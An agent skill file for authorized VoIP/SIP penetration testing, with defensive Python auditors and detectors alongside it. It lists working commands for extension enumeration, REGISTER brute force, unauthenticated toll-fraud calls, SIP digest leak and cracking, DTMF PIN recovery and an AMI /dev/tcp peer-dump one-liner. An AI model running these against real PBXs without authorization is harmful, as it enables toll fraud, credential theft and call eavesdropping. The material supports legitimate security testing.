pentesting-voip

$npx mdskill add xalgord/xalgorix/pentesting-voip



---
name: pentesting-voip
description: Testing VoIP / SIP infrastructure (default 5060/UDP+TCP, 5061/TLS, RTP media on high UDP ports) for endpoint and extension enumeration, REGISTER/digest credential cracking, unauthenticated INVITE toll fraud, SIP Digest Leak, RTP eavesdropping, and Asterisk PBX misconfiguration abuse during authorized engagements.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
- penetration-testing
- network-services
- voip
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Pentesting VoIP / SIP (port 5060)

## When to Use
- Default SIP ports `5060/udp` and `5060/tcp`; TLS (`sips:`) on `5061/tcp`; RTP media on negotiated high UDP ports. PBXs often also expose `69` TFTP, `80/443` web, `389` LDAP, `3306` MySQL, `5038` Asterisk Manager (AMI), `5222` XMPP.
- When `nmap` shows `5060` SIP, or you find IP phones / a PBX (Asterisk, FreePBX, Elastix, Cisco CallManager, Grandstream).
- SIP is text-based (HTTP-like: INVITE, REGISTER, ACK, BYE, OPTIONS) and frequently misconfigured, enabling toll fraud, eavesdropping, and credential theft.

## Quick Enumeration
```bash
# Locate SIP services (NSE + SIPVicious + sippts)
sudo nmap --script=sip-methods -sU -p 5060 10.10.0.0/24
svmap 10.10.0.0/24 -p 5060-5070 --fp          # SIPVicious mapper (UA=friendly-scanner, easily blocked)
sippts scan -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco

# Fingerprint methods/headers and craft messages
sippts enumerate -i 10.10.0.10
sippts send -i 10.10.0.10 -m INVITE -ua Grandstream -fu 200 -tu 201 -sdp

# Raw OPTIONS probe (fingerprint via Allow/Server/User-Agent)
# Via branch must start with the RFC 3261 magic cookie z9hG4bK or many stacks discard the request
printf "OPTIONS sip:<target> SIP/2.0\r\nVia: SIP/2.0/UDP attacker;branch=z9hG4bK-probe1\r\nFrom: <sip:probe@attacker>;tag=1\r\nTo: <sip:probe@<target>>\r\nCall-ID: 1@attacker\r\nCSeq: 1 OPTIONS\r\nMax-Forwards: 70\r\nContact: <sip:probe@attacker>\r\nContent-Length: 0\r\n\r\n" | nc -u -w 2 <target> 5060
```

## Critical: Checks Most Often Missed
- **Extension/username enumeration via response differences** — `401/407` (valid) vs `404/403` (invalid) on REGISTER/INVITE leaks valid extensions:
```bash
svwar 10.10.0.10 -p5060 -e100-300 -m REGISTER
sippts exten -i 10.10.0.10 -r 5060 -e 100-200
enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 10.10.0.10   # IAX
```
- **Unauthenticated INVITE = toll fraud** — a bad Asterisk context or `allowguest=true` lets anyone place/transfer calls (billed to the victim):
```bash
sippts invite -i 10.10.0.10 -fu 200 -tu 555555555 -v          # call without auth
sippts invite -i 10.10.0.10 -tu 555555555 -t 444444444        # call + transfer
```
- **SIP Digest Leak** — INVITE a phone; when it hangs up it sends a BYE, reply `407` to force a digest auth response, then crack it offline:
```bash
sippts leak -i 10.10.0.10
```
- **RTP eavesdropping** — sniff unencrypted RTP (no SRTP/ZRTP) and replay the audio; extract DTMF (voicemail PINs).
- **Asterisk misconfig**: `type=friend` SIP-trunk ignores `host` (anyone can connect), `insecure=port,invite`, default context including `external`, AMI profiles allowing any IP.
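The Asterisk settings listed above can be checked from the configuration itself before anyone sends a single INVITE. The auditor below is an added example (not part of this skill and not Asterisk code): it parses a `sip.conf`-style file and reports `allowguest`, missing `alwaysauthreject`, `type=friend` entries with a fixed host, `insecure=invite`, short secrets and dynamic peers without `permit`/`deny` ACLs. The `sip.conf` excerpt is constructed and deliberately weak so that every check fires.

```python
"""Audit an Asterisk chan_sip configuration for the misconfigurations named above.

Added example, not code from the skill or from the Asterisk project. The
sip.conf excerpt is constructed and deliberately weak so each check fires.
"""

# Constructed sip.conf: weak on purpose.
SAMPLE_SIP_CONF = """
[general]
context=default
allowguest=yes
alwaysauthreject=no

[trunk-provider]
type=friend           ; trunk defined as friend: host restriction is bypassed
host=203.0.113.10
context=from-trunk
insecure=port,invite

[100]
type=peer
host=dynamic
secret=s3cr3t-example
context=internal
permit=10.10.0.0/255.255.255.0

[101]
type=friend
host=dynamic
secret=1234
context=default
"""


def parse_sip_conf(text):
    """Minimal parser for Asterisk's INI-style config: [section], key=value or
    key => value, ';' comments. Repeated keys (e.g. several permit= lines)
    are kept as lists, which configparser would silently collapse."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and "]" in line:
            current = line[1:line.index("]")]
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        value = value.lstrip(">").strip()
        sections[current].setdefault(key.strip().lower(), []).append(value)
    return sections


def _first(section, key, default=""):
    return section.get(key, [default])[0]


def audit_sip_conf(text, min_secret_len=8):
    """Return a list of (section, message) findings, in file order."""
    conf = parse_sip_conf(text)
    findings = []
    general = conf.get("general", {})
    # chan_sip defaults allowguest to yes, so an absent key counts as weak.
    if _first(general, "allowguest", "yes").lower() != "no":
        findings.append(("general", "allowguest is not 'no': anonymous INVITEs land in the default context"))
    if _first(general, "alwaysauthreject", "no").lower() != "yes":
        findings.append(("general", "alwaysauthreject is not 'yes': 401 vs 404 replies reveal valid extensions"))
    for name, sec in conf.items():
        if name == "general":
            continue
        typ = _first(sec, "type").lower()
        host = _first(sec, "host").lower()
        insecure = _first(sec, "insecure").lower()
        secret = _first(sec, "secret")
        if typ == "friend" and host not in ("", "dynamic"):
            findings.append((name, "type=friend with a fixed host: inbound requests match on username, "
                                   "so the host restriction is bypassed; use type=peer"))
        if "invite" in insecure:
            findings.append((name, "insecure=invite: incoming INVITEs from this entry are accepted without authentication"))
        if secret and len(secret) < min_secret_len:
            findings.append((name, f"secret shorter than {min_secret_len} characters: trivial REGISTER brute force"))
        if host == "dynamic" and "permit" not in sec:
            findings.append((name, "host=dynamic without permit/deny ACL: registration accepted from any address"))
    return findings


if __name__ == "__main__":
    for section, message in audit_sip_conf(SAMPLE_SIP_CONF):
        print(f"[{section}] {message}")
```

Run it against the real `/etc/asterisk/sip.conf` (and the files it `#include`s) to get a list that maps one-to-one onto the Recommendation items in the report template; the dialplan (`extensions.conf`) still has to be reviewed by hand for a default context that reaches external trunks.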

### How to CONFIRM
- Valid extension: REGISTER/INVITE returns `401/407` while invalid ones return `404/403`.
- Toll fraud: `sippts invite` produces a `100 Trying`/`200 OK` and the external number actually rings (no auth challenge).
- Digest leak: `sippts leak` captures `Auth=Digest username=... response=...` from the victim's BYE.
- Eavesdropping: a captured RTP stream replays as intelligible audio (TLS/SRTP not in use).

## Workflow

### Step 1: Enumerate
OSINT phone numbers + Google dorks for device panels (Grandstream/Cisco/Polycom/FreePBX). Map SIP endpoints (`svmap`/`sippts scan`), fingerprint methods (`sippts enumerate`), and note adjacent services (TFTP/web/AMI).

### Step 2: Authenticate / unauth access
Enumerate extensions (`svwar`/`sippts exten`). Brute force REGISTER auth for discovered extensions:
```bash
svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080
sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt
```
Test for guest/unauthenticated calling (`allowguest`, bad contexts).
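Both halves of this step (extension enumeration, then REGISTER cracking) leave a distinctive trail on the PBX: one source address producing many `InvalidAccountID` events in a short window, or many `InvalidPassword` events for one account followed by a `SuccessfulAuth`. The detector below is an added example (not from the skill, not from Asterisk) that runs over log lines constructed in the style of Asterisk's `res_security_log` output; the addresses, timestamps and extension numbers are invented. The window and threshold are assumptions to tune per site.

```python
"""Spot extension enumeration and REGISTER brute force in Asterisk security events.

Added example, not from the skill or from Asterisk. The log lines below are
constructed in the style of Asterisk's res_security_log output (field order
as in that log; every value is invented), so the detector can run offline.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

PBX = "10.10.0.10"  # constructed PBX address


def _event_line(ts, event, account, remote_ip, severity="Error"):
    # Builds one constructed security-log line, e.g. ts = "2024-05-01T10:00:05".
    return (f"[{ts[:10]} {ts[11:]}] SECURITY[2042] res_security_log.c: "
            f'SecurityEvent="{event}",EventTV="{ts}.000+0000",Severity="{severity}",'
            f'Service="SIP",EventVersion="1",AccountID="{account}",SessionID="0x7f3a1c0",'
            f'LocalAddress="IPV4/UDP/{PBX}/5060",RemoteAddress="IPV4/UDP/{remote_ip}/5060"')


SAMPLE_LOG = (
    # 203.0.113.5 walks extensions 100..105 in six seconds: enumeration
    [_event_line(f"2024-05-01T10:00:{i:02d}", "InvalidAccountID", str(100 + i), "203.0.113.5") for i in range(6)]
    # 203.0.113.9 fails the secret of ext 200 five times, then succeeds: a brute force that worked
    + [_event_line(f"2024-05-01T10:01:{i:02d}", "InvalidPassword", "200", "203.0.113.9") for i in range(5)]
    + [_event_line("2024-05-01T10:01:07", "SuccessfulAuth", "200", "203.0.113.9", "Informational"),
       # a single typo from an internal phone: must not alert
       _event_line("2024-05-01T10:02:00", "InvalidPassword", "101", "10.10.0.21")]
)

LINE_RE = re.compile(r'SecurityEvent="(?P<event>[^"]+)",EventTV="(?P<ts>[^"]+)"'
                     r'.*?AccountID="(?P<account>[^"]*)".*?RemoteAddress="(?P<remote>[^"]+)"')


def parse_security_event(line):
    """Return {event, time, account, ip} for a security-log line, or None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%f%z")
    ip = m["remote"].split("/")[2]  # "IPV4/UDP/203.0.113.5/5060" -> address
    return {"event": m["event"], "time": ts, "account": m["account"], "ip": ip}


def detect_sip_abuse(lines, window=timedelta(seconds=60), threshold=5):
    """Sliding-window detection per remote address. Returns alerts in time order."""
    events = sorted((e for e in map(parse_security_event, lines) if e), key=lambda e: e["time"])
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    alerts, seen = [], set()
    for ip, evs in by_ip.items():
        for e in evs:
            recent = [x for x in evs if e["time"] - window <= x["time"] <= e["time"]]
            # many *different* unknown accounts from one source = extension enumeration
            unknown = {x["account"] for x in recent if x["event"] == "InvalidAccountID"}
            if len(unknown) >= threshold and (ip, "extension-enumeration") not in seen:
                seen.add((ip, "extension-enumeration"))
                alerts.append({"ip": ip, "kind": "extension-enumeration", "count": len(unknown), "account": None})
            # repeated bad secrets for the *same* account = REGISTER brute force
            failures = Counter(x["account"] for x in recent if x["event"] == "InvalidPassword")
            for account, n in failures.items():
                if n >= threshold and (ip, "register-brute-force", account) not in seen:
                    seen.add((ip, "register-brute-force", account))
                    alerts.append({"ip": ip, "kind": "register-brute-force", "count": n, "account": account})
            # a success after a flagged burst means the credential was guessed
            if e["event"] == "SuccessfulAuth" and (ip, "register-brute-force", e["account"]) in seen:
                alerts.append({"ip": ip, "kind": "success-after-brute-force", "count": 1, "account": e["account"]})
    return alerts


if __name__ == "__main__":
    for a in detect_sip_abuse(SAMPLE_LOG):
        print(f"{a['ip']:15} {a['kind']:26} account={a['account']} count={a['count']}")
```

The same three patterns are what a fail2ban jail on the Asterisk security log keys on; keeping the "success after burst" rule separate matters because a ban alone does not revoke the credential that was just guessed.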

### Step 3: Exploit / Extract
- Place unauthenticated/transferred calls (toll fraud PoC) via `sippts invite`.
- Trigger the SIP Digest Leak and crack the response.
- Sniff and crack digests from a pcap, and reconstruct audio:
```bash
sipdump -p net-capture.pcap sip-creds.txt && sipcrack sip-creds.txt -w dict.txt
sippts dump -f capture.pcap -o data.txt && sippts dcrack -f data.txt -w wordlist/rockyou.txt
# Offline crack of an extracted SIP MD5 digest (hashcat mode 11400)
hashcat -a 0 -m 11400 sip.hash /path/to/wordlist.txt
multimon -a DTMF -t wac pin.wav      # recover DTMF (e.g. voicemail PIN) from RTP audio
```

### Step 4: Post-access / pivot
With Asterisk Manager/dialplan access:
- Dump peers via AMI: `exec 3<>/dev/tcp/10.10.10.10/5038 && echo -e "Action: Login\nUsername:test\nSecret:password\nEvents: off\n\nAction:Command\nCommand: sip show peers\n\nAction: logoff\n\n">&3 && cat <&3`.
- Live eavesdrop with `ChanSpy`/`ExtenSpy`; record calls with `MixMonitor`.
- Abuse RTPBleed (RTP redirection through NAT), IVR/extension-injection (`101&SIP123123123`), and Click2Call profiles that allow any IP to originate calls.

## Key Concepts
| Concept | Description |
|---------|-------------|
| **SIP methods** | INVITE (start call), REGISTER (bind location), BYE, ACK, CANCEL, OPTIONS |
| **Digest auth** | HTTP-style MD5 (or SHA-256/512-256 per RFC 8760) challenge/response over `401/407` |
| **Extension vs username** | PBX internal IDs; username may differ from the extension |
| **RTP / SRTP / ZRTP** | Media transport; plain RTP is sniffable, SRTP/ZRTP encrypt it |
| **Asterisk context** | Dialplan grouping that governs call routing/authorization |
| **type=friend / allowguest** | Misconfigs enabling unauthenticated calls / toll fraud |
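The digest row above is the one worth understanding in detail, because it explains both the REGISTER cracking and the Digest Leak: every input to the response except the password (username, realm, nonce, URI, method, algorithm) travels in cleartext, so anyone holding one challenge/response pair can test candidate passwords offline. The verifier below is an added example, not the skill's code and not any PBX's implementation; it computes and checks the response exactly as RFC 3261 §22.4 describes (with the RFC 8760 algorithm names), rejects nonces the server never issued, and compares in constant time. Realm, nonce and credentials are constructed.

```python
"""Verify a SIP Digest Authorization header the way a PBX does (RFC 3261 §22.4,
algorithm agility per RFC 8760).

Added example, not from the skill or any PBX's source. The realm, nonce and
credentials are constructed. Everything but the password is on the wire in
cleartext, which is why a captured exchange is crackable offline.
"""
import hashlib
import hmac
import re

_ALGORITHMS = {"MD5": "md5", "SHA-256": "sha256", "SHA-512-256": "sha512_256"}
_PARAM_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def _h(algorithm, data):
    # sha512_256 is SHA-512/256 (FIPS 180-4), not a truncated SHA-512.
    return hashlib.new(_ALGORITHMS[algorithm.upper()], data.encode()).hexdigest()


def parse_digest_header(header):
    """Parse 'Digest k="v", k2=v2, ...' into a dict; values may be quoted or bare."""
    scheme, _, params = header.strip().partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest header")
    out = {}
    for m in _PARAM_RE.finditer(params):
        out[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return out


def compute_response(username, realm, password, method, uri, nonce,
                     algorithm="MD5", qop=None, nc=None, cnonce=None):
    """RFC 2617/7616 response: H(HA1:nonce:HA2), or the qop=auth form when qop is present."""
    ha1 = _h(algorithm, f"{username}:{realm}:{password}")
    ha2 = _h(algorithm, f"{method}:{uri}")
    if qop:
        return _h(algorithm, f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return _h(algorithm, f"{ha1}:{nonce}:{ha2}")


def verify_authorization(header, method, password_lookup, expected_realm, issued_nonces):
    """Server-side check. password_lookup(username) returns the secret or None."""
    try:
        p = parse_digest_header(header)
    except ValueError:
        return False
    algorithm = p.get("algorithm", "MD5")
    # Reject foreign realms, unknown algorithms and nonces we never issued (replay defence).
    if (p.get("realm") != expected_realm or p.get("nonce") not in issued_nonces
            or algorithm.upper() not in _ALGORITHMS):
        return False
    password = password_lookup(p.get("username", ""))
    if password is None:
        return False
    expected = compute_response(p["username"], expected_realm, password, method, p.get("uri", ""),
                                p["nonce"], algorithm, p.get("qop"), p.get("nc"), p.get("cnonce"))
    return hmac.compare_digest(expected, p.get("response", ""))


# Constructed PBX state: secret table, realm and the nonces handed out in 401/407 challenges.
CREDENTIALS = {"100": "Gx7-pl4nt-Nv2q"}
REALM = "asterisk"
ISSUED_NONCES = {"1a2b3c4d5e6f"}


def demo_register(password_used, algorithm="MD5"):
    """Build the Authorization header a phone would send for REGISTER and verify it."""
    uri = "sip:10.10.0.10"
    nonce = "1a2b3c4d5e6f"
    response = compute_response("100", REALM, password_used, "REGISTER", uri, nonce, algorithm)
    header = (f'Digest username="100", realm="{REALM}", nonce="{nonce}", uri="{uri}", '
              f'response="{response}", algorithm={algorithm}')
    return verify_authorization(header, "REGISTER", CREDENTIALS.get, REALM, ISSUED_NONCES)


if __name__ == "__main__":
    print("correct secret:", demo_register("Gx7-pl4nt-Nv2q"))
    print("SHA-256 digest:", demo_register("Gx7-pl4nt-Nv2q", "SHA-256"))
    print("wrong secret:  ", demo_register("1234"))
```

Switching the algorithm to SHA-256 does not change the cracking cost per guess much; what does is the length of the secret and whether the exchange is observable at all, which is why the report's recommendations pair strong secrets with TLS on 5061.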

## Tools & Systems
| Tool | Purpose |
|------|---------|
| **nmap sip-methods NSE** | SIP discovery and method enumeration |
| **SIPVicious (svmap/svwar/svcrack)** | Map services, enumerate extensions, crack REGISTER |
| **sippts** | scan/enumerate/send/exten/rcrack/invite/leak/dump/dcrack/tshark |
| **sipdump / sipcrack** | Extract & brute force SIP digests from pcap |
| **hashcat (-m 11400)** | Offline SIP MD5 digest cracking |
| **enumiax** | IAX username brute force |
| **ucsniff / Wireshark** | Sniff VoIP traffic & reconstruct RTP audio |
| **multimon** | Decode DTMF tones from RTP/audio |
| **Metasploit sip modules** | options/enumerator/sipcrack scanners |

## Common Scenarios
### Scenario 1: Toll fraud via guest context
`allowguest=true` and a default context including `external`; `sippts invite` places premium-rate calls billed to the target with no authentication.

### Scenario 2: Extension enumeration + REGISTER crack
`svwar` reveals extensions 100-110; `sippts rcrack` cracks ext 100's password, allowing registration and call placement.

### Scenario 3: RTP eavesdropping
On an open/MITM'd network, unencrypted RTP is captured and replayed as audio; embedded DTMF reveals a voicemail PIN.

## Output Format
```
## VoIP / SIP Finding

**Service**: SIP (5060/udp+tcp, 5061/tls), RTP media
**Severity**: <Critical|High|Medium>
**Target**: <IP>:5060  PBX: <Asterisk/FreePBX/Cisco ...>

### Evidence
- Extensions enumerated: <100-110> (401/407 vs 404 differential)
- Unauthenticated INVITE/toll fraud: external number rang (no auth)
- SIP Digest Leak captured + cracked: ext <100> password
- RTP eavesdropping / DTMF (voicemail PIN) recovered

### Reproduction
sippts exten -i <IP> -r 5060 -e 100-200
sippts invite -i <IP> -fu 200 -tu 555555555 -v
sippts leak -i <IP>

### Recommendation
1. Use TLS (5061) for signaling and SRTP/DTLS-SRTP for media; disable cleartext
2. Asterisk: alwaysauthreject=yes, allowguest=no, per-endpoint permit/deny ACLs
3. Avoid type=friend with bare host; restrict contexts; lock down AMI/Click2Call
4. Enforce strong passwords and SHA-256/512-256 digests; add fail2ban + rate limits
5. Patch the PBX (e.g. CVE-2024-35190); restrict SIP exposure to trusted networks
```
